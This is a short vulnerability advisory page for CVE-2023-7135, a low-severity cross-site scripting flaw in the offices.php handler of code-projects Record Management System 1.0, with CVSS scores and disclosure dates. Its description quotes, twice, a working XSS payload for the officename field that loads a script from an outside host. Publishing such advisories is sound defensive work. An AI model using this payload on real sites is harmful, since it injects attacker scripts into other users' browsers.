leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249138 is the identifier assigned to this vulnerability.", "datePublished": "2023-12-28T20:31:04Z", "dateModified": "2024-08-02T08:50:08Z", "keywords": "CVE-2023-7135, vulnerability, CVE, security, Record Management System, code-projects", "about": { "@type": "SoftwareApplication", "name": "Record Management System", "applicationCategory": "SecurityApplication", "operatingSystem": "All" } }
CVE-2023-7135 LOW

CVE-2023-7135: code-projects Record Management System Offices offices.php cross site scripting

Vendor Code-Projects
Product Record Management System
Weakness CWE-79 · XSS
Published December 28, 2023
Last update August 2, 2024

CVSS base score

2.4/10
Attack vector Network
Attack complexity Low
Privileges required High
User interaction Required
Confidentiality None
Integrity Low

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N

What the vulnerability does

01Description

A vulnerability classified as problematic has been found in code-projects Record Management System 1.0. Affected is an unknown function of the file /main/offices.php of the component Offices Handler. The manipulation of the argument officename with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249138 is the identifier assigned to this vulnerability.

Key dates

02Disclosure timeline

December 28, 2023 CVE published
August 2, 2024 Record updated

Related vulnerabilities

04Related CVE